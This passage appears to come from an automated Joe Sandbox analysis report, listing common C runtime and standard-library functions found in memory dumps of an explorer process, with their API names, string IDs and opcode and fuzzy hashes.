                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2556904055-0
                                                                                                                                                                                                                        • Opcode ID: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction ID: ca380ae7d6348eccb0085a954d4abe2dce155ebde8b2046d9fd6476e8dc80e7d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F05424601B0785FA1867E5AC947783322FB85740F95E82AD64F0B7A0DE38D4668321
                                                                                                                                                                                                                        Function 0E11D18C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2556904055-0
                                                                                                                                                                                                                        • Opcode ID: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction ID: 80b4dc6511a9768a957a3dd8757ea29205e18669305ba0e27e899905d6c52434
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82F05E74611B898AEA08ABB1FCA439923A0FB89B40F540D29C50E17750DF38D6A18301
                                                                                                                                                                                                                        Function 0FF5D18C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2556904055-0
                                                                                                                                                                                                                        • Opcode ID: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction ID: 45a167ad26a6394de4a18a6eb04e71d0e6d07a3200ff8f3ea1ab322a87d76f07
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a383330d5aa12e0c6a5916315794dbd6381eca92b06a3f7662c398b151f0b9b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F08224616B0781FE6CBBA1AC547783360FF85B80FA40835C50E57B60DE3CD061A341
                                                                                                                                                                                                                        Function 0E109C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction ID: 0f97b091b6200a8a8dd50d235f6b6951a321f30f3010c726405a23c79aeb6fc6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C31E83261878096D710CFA5E45079AB7B4FB99344F90182AEB8983A68EB7DCA45CF40
                                                                                                                                                                                                                        Function 0FF49C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction ID: f3219d79717c5338ee9018c5e4314b16719c0ae899e70cfd885bcb412587bc4b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58310932618781C6D720DF65F88036BB7B4FB89344F50142AEB8987A28EB7DD544CF00
                                                                                                                                                                                                                        Function 0E109B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction ID: 84035554273bbc3f7f264dae6db7bc931a1e2ce420b925e26e3f5f3d2c67b2d5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69311A322187C4C6D711CF65E45034ABBA1FB99354F54082AEBC983A69DB7DC655CF00
                                                                                                                                                                                                                        Function 0FF49B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction ID: d16f1ad1270426f75ea0667971ae80f0283ecbb4814edaabc7bae644f817e700
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A310732218B858AD711DF65E89035AFBA5FBD9344F54042AEBC983A29DB7DC519CF00
                                                                                                                                                                                                                        Function 0DFAE4E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAE4F9
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                          • Part of subcall function 0DFAFCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFAFCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFAE55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAE58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAE59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction ID: 5adee4813a8c4c247ab47e3d5a61c3e3fca0ee35e568e3e5be72255e51cac7ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45110361708B8591DE10DB1BF8503AAB361B7C9BE4F49C2229A5D47BA8EF78C545C740
                                                                                                                                                                                                                        Function 0DFAE410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAE429
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                          • Part of subcall function 0DFAFCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFAFCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFAE48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAE4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAE4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction ID: 7d506710f3b79cc6a632fc3949d0c113a8f99c63f7a8c2e45f30963ebd805025
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E116365708B8291DE10DB5BE8503AEB361B789BE4F49C2229E6D077A8DF7CC545C740
                                                                                                                                                                                                                        Function 0E10E410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10E429
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                          • Part of subcall function 0E10FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0E10FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E10E48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10E4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10E4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction ID: ae33b1f3503cf005af293d55d8f4daf9c737354fcfb4998d922bb0869c345cd2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45114272304B8191DE14DB16F45039AA3A1F788BE4F884A319E6D57BE8DFBCC986C740
                                                                                                                                                                                                                        Function 0E10E4E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10E4F9
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                          • Part of subcall function 0E10FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0E10FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E10E55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10E58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10E59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction ID: 572fed35013eb0145a005a3e9b984f6ed7f7cd5e4d48e7c521816cfc70f39722
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B118276304B8091DE14DB26F45039AA3A1B788BE4F884A21D96D07BE8EF78C9C6C740
                                                                                                                                                                                                                        Function 0FF4E4E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4E4F9
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                          • Part of subcall function 0FF4FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0FF4FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0FF4E55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4E58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4E59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction ID: b3c2a2f4324ef1c14d4909247a91534648fdb78dc0f07bd4e35b54ecbe383643
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59114222604B4681DE10DB26E850379B761BB88FE4F884231DE6D47BA9EF7CD146C740
                                                                                                                                                                                                                        Function 0FF4E410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4E429
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                          • Part of subcall function 0FF4FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0FF4FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0FF4E48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4E4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4E4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction ID: d1a41fc47733dc64d4a64d225e15f4233bb40f5338e78296f6a0a1f34201d8fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA114225704B4291DE10DB26E89037AB761FB88FE4F8842319E6D5BBA9DF7CD506C740
                                                                                                                                                                                                                        Function 0DFAEF80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAEF92
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0DFAEFD8
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: setlocale.LIBCMT ref: 0DFBCFF0
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: _Yarn.LIBCPMT ref: 0DFBD00A
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: setlocale.LIBCMT ref: 0DFBD019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAEFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAF008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction ID: 2b6739b9dd9bff6152cbf0224706a7af7bcbba732d804d52c77b9757cc4f0298
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0E8E231894590CB14EB2DDDA02AD7326FB94B94F86C432A74E4A568EE24CE86C351
                                                                                                                                                                                                                        Function 0E10EF80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10EF92
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E10EFD8
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: setlocale.LIBCMT ref: 0E11CFF0
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: _Yarn.LIBCPMT ref: 0E11D00A
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: setlocale.LIBCMT ref: 0E11D019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10EFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10F008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
